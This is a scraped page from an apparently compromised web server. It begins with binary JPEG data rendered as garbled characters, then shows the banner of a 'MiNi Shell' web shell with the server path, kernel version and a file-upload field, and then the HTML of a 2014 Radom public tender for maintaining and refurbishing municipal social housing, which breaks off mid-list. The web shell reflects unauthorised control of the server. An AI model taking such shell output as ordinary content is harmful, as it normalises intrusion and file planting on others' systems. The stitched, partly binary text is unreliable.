JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140402/112078-N-2014.html

<p class="kh_header"><b>Radom: KONSERWACJA ZASOBÓW ORAZ ODNAWIANIE LOKALI SOCJALNYCH I TYMCZASOWYCH DO ZASIEDLANIA W DRODZE EKSMISJI W ZASOBACH ADMINISTROWANYCH PRZEZ MIEJSKI ZARZĄD LOKALAMI W RADOMIU.</b><br>
<b>Numer ogłoszenia: 112078 - 2014; data zamieszczenia: 02.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Lokalami w Radomiu , ul. Garbarska 55/57, 26-600 Radom, woj. mazowieckie, tel. 48 383 57 50, faks 48 383 57 48 w. 231.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mzlradom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KONSERWACJA ZASOBÓW ORAZ ODNAWIANIE LOKALI SOCJALNYCH I TYMCZASOWYCH DO ZASIEDLANIA W DRODZE EKSMISJI W ZASOBACH ADMINISTROWANYCH PRZEZ MIEJSKI ZARZĄD LOKALAMI W RADOMIU..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest konserwacja zasobów oraz  odnawianie lokali socjalnych i tymczasowych do zasiedlania w drodze eksmisji w zasobach administrowanych przez Miejski Zarząd Lokalami w Radomiu. 
2. Zamawiający podzielił zamówienie na dwie części (zadania). Czynność ta ma jedynie charakter techniczny, w związku z czym zakres zamówienia jest niepodzielny i Wykonawca zobowiązany jest pod rygorem odrzucenia oferty  do złożenia oferty na oba zdania:
- Zadanie 1 - wykonywanie bieżącej konserwacji zasobów
- Zadanie 2 - wykonywanie nieprzewidzianych w Zadaniu 1,  doraźnych napraw, usuwanie awarii,  naprawa usterek i uszkodzeń powstałych w wyniku  dewastacji, zdarzeń losowych oraz odnawianie lokali socjalnych i tymczasowych do zasiedlania w drodze eksmisji
3. Ilość terenów będących w zarządzie Zamawiającego w ciągu roku może ulec zmianie z powodu ich sprzedaży lub przyjęcia w zarząd nowych nieruchomości. Zamawiający ustalił minimalną i maksymalną ilość powierzchni w budynkach, w których miałyby być świadczone usługi:
a) minimalną wartość  powierzchni do obsługi - stanowi ilość powierzchni będącej w zarządzie Zamawiającego w dniu 02 kwietnia 2014r. minus do 15% powierzchni budynków mieszkalnych oraz budynków o innym przeznaczeniu
b) maksymalną ilość powierzchni  do obsługi -  stanowi ilość powierzchni będącej w zarządzie Zamawiającego	w dniu 02 kwietnia 2014r. plus do 5% powierzchni w budynkach mieszkalnych i do 10% w budynkach o innym przeznaczeniu, na których miałyby być świadczone usługi. 
4. Prace z Zadania 2 (w zakresie odnawiania lokali) zlecane będą sukcesywnie w miarę potrzeb w ciągu całego okresu obowiązy?wania umowy w formie jednostkowych zleceń. Przewiduje się minimum 25, a maksymalnie 80 lokali do odnowienia w trakcie umowy. Zlecenia będą wystawiane na podstawie rze?czywistych potrzeb.
Zlecenia będą wystawiane dla określonego adresu wraz z określonym zakresem robót oraz terminem wykonania.
5. Wykonawca obciążać będzie Zamawiającego w okresach miesięcznych za rzeczywiście wykonane usługi, wymienione w Zadaniu 1, wg. stawek za 1 m 2 powierzchni do obsługi zaoferowanych w ofercie wybranego Wykonawcy. (Oferowane w dniu składania ofert ceny netto za obsługę 1 m 2  powierzchni, zostaną utrzymane na tym samym poziomie przez cały okres obowiązywania umowy).
6. Wykonawca obciążać będzie Zamawiającego na bieżąco za rzeczywiście wykonane roboty wymienione w Zadaniu 2 wg cen jednostkowych zaoferowanych w kosztorysie ofertowym wybranego Wykonawcy 
7. Szczegółowy opis przedmiotu zamówienia określony został w załączniku nr 1 do SIWZ, w Specyfikacji Technicznej Wykonania  i Odbioru Robót (załącznik nr 14 do SIWZ) oraz Przedmiarach robót (załącznik nr 12,  13 do SIWZ).
Zadanie 1
I  ZAKRES PRAC 
1.         Roboty instalacyjne:
1.1.      instalacje centralnego ogrzewania i centralnej ciepłej wody: 
1.1.1.  odpowietrzanie instalacji i grzejników;
1.1.2.   regulacja instalacji centralnego ogrzewania (montaż kryz dławiących, ustawianie nastaw zaworów termostatycznych);
1.1.3.   likwidacja niedogrzewań w mieszkaniach;
1.1.4.   zabezpieczenie i likwidacja przecieków w instalacjach centralnego ogrzewania i centralnej ciepłej wody - uszczelnianie zaworów i złączek (w przypadku konieczności wymiany zaworów, złączek i głowic koszty materiałów pokrywa  Zamawiający);
1.1.5.   odczytywanie głównych liczników energii cieplnej i centralnej ciepłej wody (w razie konieczności w   sytuacjach awaryjnych  w celach    kontrolnych);
1.1.6.   konserwacja i obsługa urządzeń pomiarowych;
1.1.7.    nawadnianie instalacji centralnego ogrzewania i uruchamianie wraz z rozpoczęciem sezonu 
            grzewczego oraz wykonanie czynności związanych z zakończeniem sezonu grzewczego;
1.2.	  instalacje wodociągowe i kanalizacyjne :
1.2.1. likwidacja przecieków w instalacji wodociągowej i sanitarnej - uszczelnianie zaworów i złączek
        (w przypadku konieczności wymiany zaworów, złączek i głowic koszty materiałów pokrywa  Zamawiający);
1.2.2. usuwanie miejscowych przecieków w pionach i poziomach kanalizacyjnych, łącznie 
      z wymianą poszczególnych elementów (koszty materiałów pokrywa  Zamawiający dotyczy wymiany);
1.2.3.   uzupełnianie ubytków uszczelnień połączeń instalacji kanalizacji sanitarnej, deszczowej;
1.2.4.   odłączanie nieczynnych urządzeń i osprzętu;
1.2.5.   odczyty głównych wodomierzy w budynkach (w razie konieczności w   sytuacjach awaryjnych,     w celach kontrolnych);
1.2.6.    konserwacja i obsługa urządzeń pomiarowych;
1.2.7.    usuwanie zatorów w instalacji kanalizacji sanitarnej tj. poziomy, piony bez podejść odpływowych od urządzeń w lokalach mieszkalnych i użytkowych;
1.2.8.    usuwanie zatorów na przyłączach kanalizacji sanitarnej i deszczowej;
1.2.9.    w razie potrzeb, czyszczenie wpustów do kanalizacji deszczowej oraz poziomów kanalizacji
             deszczowej;
1.2.10. zgłaszanie do właściciela sieci (Wodociągi Miejskie w Radomiu) o wszelkich nieprawidłowościach i zakłóceniach występujących w funkcjonowaniu sieci sanitarnych, przyłączy wodociągowych  i  montowanych na nich urządzeniach i osprzęcie.

1.3.	   instalacje gazowe :
1.2.1	likwidacja nieszczelności w instalacji gazowej zgłaszanych indywidualnie;
1.3.2..    zabezpieczenie w razie potrzeb przed korozją pionów i poziomów instalacji;                                 
1.3.3.    bezwzględna likwidacja nielegalnego poboru gazu;
1.3.4.    naprawa szafek gazowych i ich zamknięć;
1.3.5     uzupełnienie zabezpieczeń antykorozyjnych i powłok malarskich szafek gazowych;
1.3.6.   przeglądy okresowe - roczne kontrole stanu technicznej sprawności wewnętrznych instalacji gazowych wraz z usunięciem nieszczelności  na odcinkach od gazomierzy do odbiorników gazowych w 630 lokalach. Roczne kontrole stanu technicznej sprawności wewnętrznych instalacji gazowych obejmują: -
	- sprawdzenie kurków głównych, 
	- sprawdzenie części instalacji na poziomie piwnic i poza budynkiem
	- sprawdzenie pionów gazowych
	- sprawdzenie części instalacji od gazomierzy do urządzeń gazowych (odbiorników)
	- kontrola gazomierzy
	- kontrola odbiorników gazowych
	- sprawdzenie stanu technicznego przewodów spalinowych i ich połączeń z urządzeniami gazowymi i kanałem spalinowym ( szczelność  połączenia przewodu ze ścianą)
	- wykonanie kontroli szczelności przewodów instalacji gazowych
	- wykonanie kontroli prawidłowości doboru średnic przewodów instalacji gazowych - zgodnie 
	z obowiązującymi przepisami
	
1.3.7.    zgłaszanie do właściciela sieci (ZG) o wszelkich nieprawidłowościach i zakłóceniach występujących w funkcjonowaniu przyłączy gazowych i montowanych na nich urządzeniach i osprzęcie.

1.4.        instalacje elektryczne :
1.4.1.    usuwanie awarii instalacji elektrycznych zasilających lokale mieszkalne, użytkowe i części wspólne;
1.4.2. sprawdzanie i regulacja czasu działania oświetlenia w częściach wspólnych   
              i instalacjach zewnętrznych;
1.4.3.    sprawdzanie prawidłowości połączeń i działania instalacji elektrycznej w częściach wspólnych
             budynków, tablic i rozdzielni elektrycznych oraz usuwanie usterek;
1.4.4     sprawdzanie stanu i bieżące uzupełnianie napisów, oznaczeń, schematów tablic i rozdzielni
             elektrycznych;
1.4.5.    sprawdzanie działania zabezpieczeń, wyłączników;
1.4.6.    bezwzględna likwidacja nielegalnego poboru energii elektrycznej łącznie ze zgłoszeniem tego
              faktu na Policję ;
1.4.7.    wymiana uszkodzonych żarówek i bezpieczników (koszty materiałów pokrywa Zamawiający);
1.4.8.   naprawa zamocowania opraw oświetleniowych, przełączników, przycisków, korytek kablowych
            rur i przewodów elektrycznych w częściach wspólnych budynku (klatkach schodowych,
             korytarzach , piwnicach, strychach itp.);
1.4.9.  sprawdzanie i naprawa stanu zamknięć tablic, rozdzielni i urządzeń elektrycznych oraz bieżące ich zabezpieczenie w przypadku otwarcia;
1.4.10. wskazanie miejsc podłączenia urządzeń elektrycznych wykonawcy innych prac na czas prowadzonych przez niego remontów w budynku oraz podłączenie 1 gniazda (materiał wnioskującego wykonawcy);
1.4.11. czyszczenie szafek elektrycznych oraz ich naprawa.
1.4.12. uzupełnienie zabezpieczeń antykorozyjnych i powłok malarskich szafek elektrycznych;
1.4.13. sprawdzanie sprawności urządzeń pomiarowych w części wspólnej;
1.4.14. zgłaszanie do właściciela sieci (ZE) o wszelkich nieprawidłowościach i zakłóceniach występujących w funkcjonowaniu przyłączy elektrycznych i montowanych na nich urządzeniach.

1.5. instalacja odgromowa:
3.5.1.   sprawdzanie i konserwacja stanu połączeń i ciągłości instalacji odgromowej (uzupełnianie  braków do 5 mb.  i smarowanie złączy).

2.      Roboty ogólnobudowlane:
2.1.    uzupełnianie i naprawa tynków wewnętrznych w częściach wspólnych  o łącznej powierzchni   do 3 m2;
2.2.    uzupełnianie i naprawa tynków zewnętrznych o łącznej powierzchni do 3 m2;
2.3.    naprawa mocowania balustrad na klatkach schodowych;
2.4.    mocowanie i wymiana pochwytów długości do 3 m;
2.5.  uzupełnianie miejscowych ubytków  posadzek, okładzin schodów i okładzin ceramicznych( koszty 
           materiałów pokrywa Zamawiający);
2.6.    naprawa tynku przy ościeżach;
2.8.    dopasowanie drzwi i okien w częściach wspólnych budynku
2.8.    naprawa zamków, zawiasów i zamknięć do drzwi i okien w częściach wspólnych budynków; 
2.9.    naprawa lub uzupełnianie klamek w drzwiach i oknach części wspólnych budynków;
2.10.  wymiana wkładek lub montaż nowych zamków, zasuw (koszty materiałów pokrywa  Zamawiający);

3.       Dachy: 
3.1.   dokonywanie przeglądów stanu technicznego pokrycia dachowego i obróbek blacharskich dwa razy w roku (wiosna, jesień);
3.2.   czyszczenie rynien i rur spustowych dwa razy w roku (wiosna, jesień);
3.3.   naprawa obróbek blacharskich (rynien, rur spustowych i pozostałych elementów);
3.4.   regulacja spadków rynien, naprawa lub wymiana mocowania rynien i rur spustowych, 
3.5.   likwidacja nieszczelności  i przecieków z dachu;
3.6.   naprawa pokrycia dachowego z wymianą do 10 m2 powierzchni dachu (koszty materiałów pokrywa  Zamawiający);
3.7.   niezwłoczne usuwanie, skupisk śniegu lodu i powstałych sopli (pas nadrynnowy, podrynnowy, rynny     i rury spustowe (koszty sprzętu - podnośnik koszowy pokrywa  Zamawiający);  

Uwaga
Powyższy zakres prac dotyczy ujętych w wykazie  budynków mieszkalnych i użytkowych oraz budynków gospodarczych (komórki, ) przynależnych do budynków. 

Zadanie 2

ZAKRES PRAC - ROZLICZENIE KOSZTORYSEM POWYKONAWCZYM

1.  Odnawianie lokali socjalnych i tymczasowych do zasiedlania w ramach wykonania wyroków eksmisji. 
   1.1.  malowanie ścian, otworów okiennych i drzwiowych;
   1.2.  uzupełnienie oszklenia w otworach okiennych;
   1.3   wymiana lub naprawa stolarki okiennej i drzwiowej;
   1.4.  wymiana wykładzin lub ich uzupełnienie;
   1.5.  częściowa wymiana podłóg drewnianych;
   1.6.  malowanie podłóg drewnianych;
   1.7.  reperacja posadzek;
   1.8.  wymiana lub naprawa urządzeń sanitarnych i grzewczych;
   1.9.  wymiana lub naprawa instalacji elektrycznej wraz z osprzętem;
1.10.  wymiana lub naprawa instalacji wod-kan;
   1.11. montaż lub wymiana wodomierzy. 
   1.12  naprawa lub wymiana instalacji gazowej 
   1.13. próba szczelności instalacji gazowej
2.  Zamawiający dopuszcza możliwość zlecenia Wykonawcy bieżących i pilnych prac  , konserwacyjnych i remontowych wykraczających poza zakres prac opisanych w Zadaniu 1 (zwłaszcza wynikłych   wskutek zdarzeń losowych:  awarii, wichury, ulewy, śnieżyc, oraz dewastacji, itp.) . 
3.Wynagrodzenie za w/w prace opisane w Zadaniu 2  wyliczone będzie na podstawie  cen jednostkowych przedstawionych w kosztorysie ofertowym przez Wykonawcę a w przypadku wykonania prac nie ujętych w przedmiarze w kosztorysie ofertowym rozliczane będą na podstawie   kosztorysów w oparciu o KNR i cenniki SEKOCENBUDU. Robocizna według stawek    przedstawionych przez Wykonawcę w formularzu ofertowym stanowiącym załącznik do SIWZ. Ceny materiałów i sprzętu - nie wyższe niż średnie ceny wraz z kosztami zakupu z SEKOCENBUDU ( ceny materiałów i sprzętu dotyczą również pkt I) , A w przypadku braku materiałów  w tym wydawnictwie, według Orgbud-u ( ceny materiałów i sprzętu dotyczą również Zadania1). Jeżeli w wydawnictwach SEKOCENBUD-u i  Orgbud -u nie znajduje się odpowiednia pozycja i jest brak podstaw do wyceny, kalkulacje własne Wykonawcy wymagają uzgodnienia i zatwierdzenia przez Zamawiającego.
4.Wykaz budynków będących przedmiotem zamówienia określa załącznik do SIWZ. Stan na 02.kwietnia 2014
Wykonawca świadczyć będzie w ramach umowy usługi pogotowia technicznego i zapewni dyżur telefoniczny tj. przyjmowanie i realizację pilnych zgłoszeń  :
- w dni robocze od 15.30 do 7.30j rano,
- w dni wolne od pracy całodobowo.
Wykonawca ma obowiązek przystąpić do usuwania awarii niezwłocznie po otrzymaniu zawiadomienia - w terminie nie dłuższym niż 2 godziny
Wykonawca usuwa awarie w dni robocze, wolne od pracy oraz świąteczne. Natomiast naprawy i konserwacje  prowadzone są w dni robocze.
Wykonawca ma obowiązek zawiadamiać Zamawiającego o wykonaniu prac, a Zamawiający przystąpić do ich odbioru.
Zlecanie prac jak również ich odbiory odbywać się będzie zleceniem konserwacyjnym/remontowym sporządzonym pisemnie.
Koszty materiałów i sprzętu używanych przy realizacji zadania 1 pokrywa Wykonawca za wyjątkiem materiałów i sprzętu ściśle określonego w pkt I.
Uwaga : Koszty materiałów i sprzętu (ściśle określonego w zadaniu 1), które nie objęte są rozliczeniem kosztów z m 2 powierzchni, nazywane jako koszty, które ponosi Zamawiający rozliczane są kosztorysowo - zgodnie z rozliczeniem kosztów opisanych w zadaniu 2 (ceny jednostkowe z kosztorysu ofertowego)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.45.30.00-7, 50.80.00.00-3, 50.70.00.00-2, 45.30.00.00-0, 45.26.19.00-3, 45.44.10.00-0, 45.44.21.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku udziału w postępowaniu. Zamawiający oceni spełnienie tego warunku w oparciu o treść oświadczenia o spełnieniu warunków udziału w postępowaniu. Do złożenia oświadczenia można wykorzystać załączony do SIWZ wzór oświadczenia. Ocena spełnienia warunku dokonana będzie metodą zero-jedynkową.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 roboty budowlane o wartości nie mniejszej niż 350 000,00 zł. brutto, słownie trzysta pięćdziesiąt tysięcy brutto każda z nich, które swym zakresem obejmowały jednocześnie  roboty ogólnobudowlane, gazowe, sanitarne i elektryczne potwierdzone dowodami, określającymi, że roboty te zostały wykonane w sposób należyty oraz wskazujący, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagania postawione w warunkach nie sumują się w ramach tego samego warunku w sposób prosty, co oznacza np. iż przynajmniej jeden z wykonawców powinien wykazać się 2 robotami budowlanymi o wartości 350 000 zł brutto każda , a nie jeden z nich robotami np. o wartości 200000 zł. i drugi robotami  o wartości 150 000 zł (załącznik nr 6 do SIWZ)
Jeżeli wykonawca spełnia warunek polegając na wiedzy i doświadczeniu innego podmiotu zobowiązany jest załączyć pisemne zobowiązanie podmiotu, z którego jednoznacznie będzie wynikało, że podmiot ten będzie uczestniczył w realizacji przedmiotu zamówienia, oraz  zobowiązany jest przedłożyć dokumenty wymienione w Rozdziale VII pkt 2 dotyczące tych podmiotów, z których zasobów korzysta dla potwierdzenia spełniania warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że:
dysponuje potencjałem technicznym umożliwiającym wykonanie przedmiotowego zamówienia tj. posiada co najmniej: 
- jeden samochód ciężarowy, o masie całkowitej do 3.5 t
- trzy środki transportu umożliwiające sprawne dotarcie do miejsc awarii
- elektronarzędzia: wiertarka- 1szt., wyrzynarka- 1szt., szlifierka kątowa-1 szt., wkrętarka- 1 szt., 
- młot udarowy - 1 szt.,
- zagęszczarkę - 1 szt.,
- zgrzewarkę do rur - 1 szt., 
 - spawarkę- 1 szt.,
- maszyny blacharskie (zginarka - 1 sztuka, rowkarka - 1 sztuka, nożyce do blachy - 1 sztuka)
 - maszynę do udrażniania kanałów sanitarnych i burzowych (ciśnieniowa lub mechaniczna),
 - urządzenie do odmrażania instalacji wod-kan,
 - mierniki pomiarowe elektryczne, gazowe (załącznik nr 8 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że: dysponuje  osobami zdolnymi do wykonania poszczególnych zakresów robót tj.
- dwoma robotnikami wykwalifikowanymi w specjalności instalacyjnej elektrycznej z uprawnieniami elektrycznymi posiadającymi świadectwo kwalifikacyjne wydane przez Stowarzyszenie Elektryków Polskich lub Komisję o równorzędnych uprawnieniach co SEP zezwalające na pracę przy urządzeniach  i instalacjach elektrycznych
-  trzema robotnikami wykwalifikowanymi w specjalności instalacyjnej sanitarnej
-  jednym robotnikiem wykwalifikowanym w specjalności blacharsko-dekarskiej.
- jednym robotnikiem wykwalifikowanym w specjalności spawacza posiadającym Zaświadczenie o ukończeniu szkolenia albo Świadectwo egzaminu spawacza lub Książkę spawacza, wystawiane w trybie określonym w odrębnych przepisach i Polskich Normach, z uwzględnieniem przepisu § 28 Rozporządzenia Ministra Gospodarki z dnia 27 kwietnia 2000 w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz. U. z 2000 r. Nr 40 poz. 470), 
-  jednym robotnikiem z uprawnieniami do zajmowania się eksploatacją urządzeń instalacji gazowych, 
- jednym robotnikiem z uprawnieniami do zajmowania się dozorem w zakresie obsługi, napraw i konserwacji urządzeń i instalacji gazowych, 
- jedną osobą z uprawnieniami budowlanymi do wykonywania samodzielnych funkcji w budownictwie w specjalności konstrukcyjno - budowlanej, 
Osoba pełniąca funkcję kierownika robót musi mieć co najmniej trzyletnią praktykę zawodową jako kierownik robót. 
Osoba proponowana do pełnienia funkcji kierownika robót musi posiadać uprawnienia do wykonywania samodzielnych funkcji w budownictwie odpowiadających wymaganiom określonym w ustawie - Prawo budowlane lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
W przypadku osób będących obywatelami krajów członkowskich Unii Europejskiej oznacza to decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczypospolitej Polskiej samodzielnych funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia - zgodnie z właściwymi przepisami w szczególności z ustawą z dnia 18 marca 2008 r. o zasadach uznania kwalifikacji zawodowych nabytych w krajach członkowskich Unii Europejskiej ( Dz.U. z 2008 r nr 63,poz. 394) oraz ustawą z dnia 15 grudnia 2000 r o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (j.t. Dz. U. z 2013.932 ze zm.)
- jedną osobą z uprawnieniami budowlanymi w specjalności instalacyjno - inżynieryjnej  w   zakresie instalacji sanitarnych. Warunek zostanie uznany za spełniony również wtedy, gdy jedna osoba będzie posiadała uprawnienia w obu  specjalnościach.  (tzn.  w specjalności instalacyjno - inżynieryjnej  w zakresie instalacji sanitarnych oraz w specjalności konstrukcyjno - budowlanej) (załącznik nr 7 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku udziału w postępowaniu. Zamawiający oceni spełnienie tego warunku w oparciu o treść oświadczenia o spełnieniu warunków udziału w postępowaniu. Do złożenia oświadczenia można wykorzystać załączony do SIWZ wzór oświadczenia. Ocena spełnienia warunku dokonana będzie metodą zero-jedynkową.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
